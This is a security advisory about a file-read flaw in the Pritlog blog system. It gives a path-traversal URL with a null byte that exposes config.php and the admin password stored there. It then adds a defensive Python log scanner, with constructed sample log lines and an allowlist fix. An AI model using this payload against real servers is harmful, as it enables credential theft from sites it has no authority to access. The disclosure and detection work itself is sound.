-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Pritlog <= 0.4: Remote File Edition Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$ Program: Pritlog
$ File affected: index.php
$ Version: 0.4
$ Download: http://www.hardkap.net/pritlog
Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org
– Description (from the author's page) –
PRITLOG is an extremely simple, small and powerful blog system. It does not
use or need a MYSQL database and fully works based on flat files. The idea
is derived from a similar app called PPLOG.
– Bug –
You can browse and view the entries with a URL such as:
http://localhost/p/index.php?option=viewEntry&filename=00001
Code doesn't check the comments directory:
– Exploit –
If magic quotes are off you can do:
http://localhost/p/index.php?option=viewEntry&filename=../config.php%00
config.php contains the admin password.
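
– Detection (added example) –
The following log check is an added example, not part of the original advisory or of Pritlog's code: it scans web server access logs for viewEntry requests whose filename parameter carries a null byte or a parent-directory segment, as in the request above. It assumes combined-format access logs and that legitimate entry names are plain alphanumerics like 00001; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2009:10:00:00 +0000] "GET /p/index.php?option=viewEntry&filename=00001 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2009:10:02:13 +0000] "GET /p/index.php?option=viewEntry&filename=../config.php%00 HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Jan/2009:10:03:00 +0000] "GET /p/index.php HTTP/1.1" 200 9001',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SAFE_NAME = re.compile(r'[0-9A-Za-z_-]+')  # assumption: entry names look like 00001

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding so matching runs on the final string."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return the reasons a filename value is suspicious (empty list if none)."""
    value = decode_fully(value)
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("traversal")
    if not reasons and not SAFE_NAME.fullmatch(value):
        reasons.append("unexpected-name")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for each suspicious viewEntry request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "viewEntry" not in params.get("option", []):
            continue
        for value in params.get("filename", []):
            reasons = classify(value)
            if reasons:
                findings.append((number, reasons))
    return findings

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

The same allowlist used in SAFE_NAME is the natural server-side fix: reject any filename value that is not a plain entry name before it is used to build a path.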